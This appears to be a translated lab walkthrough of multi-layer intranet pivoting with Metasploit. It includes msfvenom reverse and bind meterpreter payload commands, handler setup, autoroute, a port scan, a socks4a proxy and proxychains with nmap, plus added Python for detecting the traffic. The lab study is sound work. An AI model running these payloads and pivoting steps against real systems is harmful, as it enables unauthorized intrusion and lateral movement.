Intranet pivoting through a multi-layer network

September 11, 2020 Web Penetration Testing

Environment setup

Attacker machine: kali
Targets:
Layer 1: ubuntu-16, exposing an Apache service
Layer 2: windows-10, exposing a python http service
Layer 3: ubuntu-18, exposing a python http service

Network topology: (diagram image not reproduced here)

Layer-1 target

Generate shell.elf with msfvenom

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.37.129.4 LPORT=10001 -f elf > shell.elf

Receive the shell with msf

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.37.129.4
lhost => 10.37.129.4
msf5 exploit(multi/handler) > set lport 10001
lport => 10001
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 10.37.129.4:10001 
[*] Sending stage (3021284 bytes) to 10.37.129.3
[*] Meterpreter session 1 opened (10.37.129.4:10001 -> 10.37.129.3:51818) at 2020-09-11 11:59:42 +0800

meterpreter > shell
Process 5755 created.
Channel 1 created.
whoami
root
exit
meterpreter > ipconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : enp0s5
Hardware MAC : 00:1c:42:bf:dc:a6
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.129.3
IPv4 Netmask : 255.255.255.0
IPv6 Address : fdb2:2c26:f4e4:1:acba:39b0:bd5c:a5de
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::593f:cc6d:4234:e5e6
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : enp0s6
Hardware MAC : 00:1c:42:dd:88:60
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.132.4
IPv4 Netmask : 255.255.255.0
IPv6 Address : fdb2:2c26:f4e4:2:2126:9877:d1c1:6a6d
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::f69e:4ffb:a6c2:77cd
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fdb2:2c26:f4e4:2:e68c:2f44:d7a9:162a
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  4
============
Name         : docker0
Hardware MAC : 02:42:35:29:f2:ef
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.17.0.1
IPv4 Netmask : 255.255.0.0

meterpreter >

The ipconfig output shows a second interface, enp0s6, with address 10.37.132.4: the host also sits on the second-layer network 10.37.132.0/24.
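The property that makes this host a pivot point is that it is multi-homed, and a defender inventories exactly that. As an added example (not from the original post), the following Python parses the meterpreter ipconfig output shown above and reports which networks the host bridges; the sample input is a constructed abridgement of that output (IPv6 lines and docker0 left out).

```python
import ipaddress

# Constructed sample, abridged from the meterpreter ipconfig output above.
SAMPLE = """
Interface  1
Name         : lo
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface  2
Name         : enp0s5
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.129.3
IPv4 Netmask : 255.255.255.0

Interface  3
Name         : enp0s6
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.132.4
IPv4 Netmask : 255.255.255.0
"""

def parse_ipconfig(text):
    """Split the output into one {field: value} dict per 'Interface N' block."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.startswith("Interface"):
            cur = {}
            blocks.append(cur)
            continue
        key, sep, val = line.partition(":")   # first colon separates field from value
        if cur is not None and sep:
            cur[key.strip()] = val.strip()
    return blocks

def reachable_subnets(text):
    """Map each UP, non-loopback interface name to its IPv4 network."""
    nets = {}
    for b in parse_ipconfig(text):
        if "LOOPBACK" in b.get("Flags", "") or "IPv4 Address" not in b:
            continue
        iface = ipaddress.IPv4Interface(f"{b['IPv4 Address']}/{b['IPv4 Netmask']}")
        nets[b["Name"]] = iface.network
    return nets

def is_multihomed(text):
    """True when the host sits on more than one network and so can bridge them."""
    return len(set(reachable_subnets(text).values())) > 1
```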

We add a route to that network through msf (autoroute):

meterpreter > run autoroute -s 10.37.132.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.37.132.0/255.255.255.0...
[+] Added route to 10.37.132.0/255.255.255.0 via 10.37.129.3
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.37.132.0        255.255.255.0      Session 1

meterpreter >

Then use background to drop back to the msf prompt, and use auxiliary/scanner/portscan/tcp to scan the second-layer network for hosts with port 80 open.

msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.37.132.1/24
RHOSTS => 10.37.132.1/24
msf5 auxiliary(scanner/portscan/tcp) > set ports 80
ports => 80
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 10.37.132.4:          - 10.37.132.4:80 - TCP OPEN
[+] 10.37.132.5:          - 10.37.132.5:80 - TCP OPEN
[*] 10.37.132.1/24:       - Scanned  26 of 256 hosts (10% complete)
[*] 10.37.132.1/24:       - Scanned  52 of 256 hosts (20% complete)
[*] 10.37.132.1/24:       - Scanned  77 of 256 hosts (30% complete)
[*] 10.37.132.1/24:       - Scanned 103 of 256 hosts (40% complete)

10.37.132.5 turns out to be alive; next, set up a socks4a proxy with msf.

msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9999
SRVPORT => 9999
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/socks4a) > 
[*] Starting the socks4a proxy server

msf5 auxiliary(server/socks4a) > show options 

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  9999             yes       The port to listen on.


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  


msf5 auxiliary(server/socks4a) > 

Configure Kali's browser to use the SOCKS proxy at 127.0.0.1:9999 (the SRVPORT set above), and the service exposed by the second-layer host 10.37.132.5 can be reached through the browser.

To run other tools through the proxy as well, use proxychains; configure /etc/proxychains.conf:

dynamic_chain
[ProxyList]
socks4  127.0.0.1 9999
One thing to note: proxychains does not support UDP or ICMP, since SOCKS4 relays TCP only; that is why the nmap scan below uses -sT (TCP connect scan) and -Pn (skip ICMP host discovery).
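To make that caveat concrete, here is an added example (not from the original post) that builds the SOCKS4/SOCKS4a CONNECT request a client such as proxychains or the browser sends to 127.0.0.1:9999 and decodes the proxy's reply; the request format carries only TCP commands, which is the reason the note above holds. The hostname and userid in the test are constructed values.

```python
import socket
import struct

CONNECT = 1  # SOCKS4 command codes: 1 = CONNECT, 2 = BIND; there is no UDP or ICMP command

def socks4a_connect_request(host, port, userid=""):
    """Build the request a SOCKS4/4a client sends to the proxy.
    A dotted-quad host is sent as plain SOCKS4. A hostname uses the SOCKS4a form
    (DSTIP = 0.0.0.x, name appended after the userid) so the proxy resolves it on
    the far side of the pivot instead of the client resolving it locally."""
    try:
        dstip, tail = socket.inet_aton(host), b""
    except OSError:
        dstip, tail = b"\x00\x00\x00\x01", host.encode() + b"\x00"
    return (bytes([4, CONNECT]) + struct.pack("!H", port) + dstip
            + userid.encode() + b"\x00" + tail)

def parse_socks4_reply(data):
    """Decode the 8-byte reply into (granted, port, ip). CD 90 = granted, 91-93 = rejected."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    cd, port = data[1], struct.unpack("!H", data[2:4])[0]
    return cd == 90, port, socket.inet_ntoa(data[4:8])
```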

Scanning with proxychains + nmap

proxychains nmap -sT -Pn  10.37.132.5
Nmap scan report for windows10.host-only--2 (10.37.132.5)
Host is up (0.0020s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 23.29 seconds

To reach the second-layer target we need a forward (bind) connection: the second-layer host cannot reach our attacker machine directly, so instead of a reverse payload we use bind_tcp and connect to it over the route added through session 1.

Generate the Windows backdoor file

msfvenom -p windows/meterpreter/bind_tcp  LPORT=6668 -f exe > shell_3.exe

Connect from msf:

msf5 auxiliary(scanner/portscan/tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 10.37.132.5
rhost => 10.37.132.5
msf5 exploit(multi/handler) > set lport 6668
lport => 6668
msf5 exploit(multi/handler) > exploit -j
[*] Started bind TCP handler against 10.37.132.5:6668
[*] Sending stage (180291 bytes) to 10.37.132.5
[*] 10.37.132.5 - Meterpreter session 3 closed.  Reason: Died
[*] Meterpreter session 3 opened (10.37.129.4-10.37.129.3:0 -> 10.37.132.5:6668) at 2020-09-11 17:29:25 +0800
msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  2         meterpreter x64/linux    uid=0, gid=0, euid=0, egid=0 @ 10.37.129.3  10.37.129.4:10001 -> 10.37.129.3:53086 (10.37.129.3)
  4         meterpreter x86/windows  F449\radish @ F449                          10.37.129.4-10.37.129.3:0 -> 10.37.132.5:6668 (10.37.132.5)

msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > background 
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ls
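Seen from the defender's side, both the port-80 sweep of 10.37.132.0/24 and the bind_tcp connection to 10.37.132.5:6668 originate from the layer-1 web server, a host that should accept connections rather than start them. This added Python (not from the original post) runs two checks over constructed flow records modelled on that traffic; the server-role list and the outbound port allowlist are assumptions for this lab.

```python
import ipaddress
from collections import defaultdict

# Constructed flow records (ts, src, dst, dport) modelled on this lab: the layer-1
# web server 10.37.129.3 sweeps 10.37.132.0/24 on port 80, then connects to the
# workstation 10.37.132.5 on the bind_tcp port 6668. The last record is benign.
FLOWS = [(i, "10.37.129.3", f"10.37.132.{i}", 80) for i in range(1, 30)] + [
    (40, "10.37.129.3", "10.37.132.5", 6668),
    (41, "10.37.129.10", "10.37.129.3", 80),
]

SERVER_ROLE = {"10.37.129.3"}                         # assumption: hosts that accept, not originate
NEXT_SUBNET = ipaddress.ip_network("10.37.132.0/24")  # the network behind the pivot host
ALLOWED_OUTBOUND = {53, 80, 443}                      # assumption: ports a server may originate to

def horizontal_scans(flows, min_targets=20, window=60):
    """(src, dport, n) for sources hitting >= min_targets distinct dsts on one port within window seconds."""
    seen = defaultdict(list)
    for ts, src, dst, dport in flows:
        seen[(src, dport)].append((ts, dst))
    alerts = []
    for (src, dport), hits in seen.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            dsts = {d for t, d in hits[i:] if t - t0 <= window}
            if len(dsts) >= min_targets:
                alerts.append((src, dport, len(dsts)))
                break
    return alerts

def server_originated_odd_ports(flows):
    """Server-role host opening a connection into the next subnet on a non-allowlisted port."""
    return [(src, dst, dport) for _, src, dst, dport in flows
            if src in SERVER_ROLE and ipaddress.ip_address(dst) in NEXT_SUBNET
            and dport not in ALLOWED_OUTBOUND]
```

The sweep is caught by the first check even though port 80 is allowlisted, and the bind connection by the second; the benign client-to-web-server record trips neither.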

Set up the route in the second-layer session

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.37.132.0        255.255.255.0      Session 2

meterpreter > run autoroute -s 10.37.133.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.37.133.0/255.255.255.0...
[-] Could not execute autoroute: ArgumentError Invalid :session, expected Session object got Msf::Sessions::Meterpreter_x86_Win
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.37.132.0        255.255.255.0      Session 2
   10.37.133.0        255.255.255.0      Session 4

meterpreter > 

I do not know why this error is reported, but the browser proxy can reach the third-layer machine.
